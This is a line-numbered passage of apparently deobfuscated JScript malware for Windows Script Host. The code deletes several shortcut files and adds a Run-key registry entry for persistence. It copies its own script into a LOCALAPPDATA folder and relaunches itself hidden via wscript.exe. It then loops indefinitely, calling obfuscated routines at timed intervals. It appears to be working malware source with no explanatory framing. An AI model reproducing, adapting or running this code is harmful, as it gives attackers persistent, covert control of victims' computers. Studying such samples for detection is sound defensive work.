738.           save();
739.         }
740.         lo$jscomp$0.push(p$jscomp$0);
741.         /** @type {!Array} */
742.         cbb$jscomp$0 = ["Windows Explorer.lnk", "empezar.lnk", "atajo.lnk"];
743.         /** @type {number} */
744.         i1$jscomp$0 = 0;
745.         for (; i1$jscomp$0 < cbb$jscomp$0.length; i1$jscomp$0++) {
746.           try {
747.             b$jscomp$0.deleteFile(pp$jscomp$0 + cbb$jscomp$0[i1$jscomp$0]);
748.           } catch (e) {
749.           }
750.         }
751.       } catch (e) {
752.       }
753.       try {
754.         a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + ha$jscomp$0(g$jscomp$0 + "a15"), '"' + fet$jscomp$0 + '" "' + bfi$jscomp$0 + '"');
755.       } catch (e) {
756.       }
757.       if (WScript.ScriptFullName.split("\\").shift() == d$jscomp$0("systemdrive")) {
758.         lo$jscomp$0.push(WScript.ScriptFullName);
759.       }
760.       /** @type {string} */
761.       var tc$jscomp$0 = d$jscomp$0("temp") + "\\" + ha$jscomp$0(g$jscomp$0 + "a08") + ".js";
762.       if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) {
763.         try {
764.           b$jscomp$0.deleteFile(tc$jscomp$0);
765.         } catch (e) {
766.         }
767.         WScript.quit();
768.       } else {
769.         if (su$jscomp$0 >= 0) {
770.           try {
771.             Oq$jscomp$0 = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00"), 8, true);
772.           } catch (e) {
773.           }
774.         }
775.       }
776.       hr$jscomp$0(0);
777.       sk$jscomp$0();
778.     } catch (e) {
779.       WScript.quit();
780.     }
781.     for (; true;) {
782.       if (zzo$jscomp$0() !== false) {
783.         for (; true;) {
784.           try {
785.             /** @type {number} */
786.             i$jscomp$3 = (new Date).getTime();
787.             $$jscomp$0("1", 1);
788.             for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
789.               WScript.sleep(2E3);
790.             }
791.           } catch (e) {
792.             if (zzo$jscomp$0() == false) {
793.               break;
794.             }
795.             /** @type {number} */
796.             i$jscomp$3 = (new Date).getTime();
797.             for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
798.               WScript.sleep(2E3);
799.             }
800.           }
801.         }
802.       } else {
803.         /** @type {number} */
804.         i$jscomp$3 = (new Date).getTime();
805.         for (; i$jscomp$3 + 60 * 53 * 1E3 >= (new Date).getTime(); sk$jscomp$0()) {
806.           WScript.sleep(2E3);
807.         }
808.       }
809.     }
810.   } else {
811.     /** @type {string} */
812.     bfo$jscomp$0 = d$jscomp$0("userprofile") + (vn$jscomp$0[0] >= 6 ? "\\AppData\\Roaming\\" : "\\") + ha$jscomp$0(g$jscomp$0 + "02") + "\\";
813.     if (b$jscomp$0.folderExists(bfo$jscomp$0)) {
814.       /** @type {string} */
815.       hd$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "03");
816.       /** @type {string} */
817.       tff$jscomp$0 = "";
818.       if (b$jscomp$0.fileExists(hd$jscomp$0)) {
819.         try {
820.           otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 1);
821.           tff$jscomp$0 = otf$jscomp$0.readAll();
822.           otf$jscomp$0.close();
823.         } catch (e) {
824.         }
825.       }
826.     }
827.     var bbs$jscomp$0 = d$jscomp$0("localappdata") + "\\" + ha$jscomp$0(g$jscomp$0 + "a02");
828.     /** @type {string} */
829.     var bbz$jscomp$0 = bbs$jscomp$0 + "\\" + ha$jscomp$0(g$jscomp$0 + "a04") + ".js";
830.     try {
831.       b$jscomp$0.createFolder(bbs$jscomp$0);
832.     } catch (e) {
833.     }
834.     b$jscomp$0.copyFile(WScript.ScriptFullName, bbz$jscomp$0, true);
835.     if (tff$jscomp$0 != "") {
836.       try {
837.         otf$jscomp$0 = b$jscomp$0.openTextFile(bbs$jscomp$0 + "\\" + ha$jscomp$0(g$jscomp$0 + "a03"), 2, 1);
838.         otf$jscomp$0.write(tff$jscomp$0);
839.         otf$jscomp$0.close();
840.       } catch (e) {
841.       }
842.     }
843.     ru$jscomp$0.shellExecute("wscript.exe", '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + Math.random()), "", "", 0);
844.     WScript.quit();
845.   }
846. })();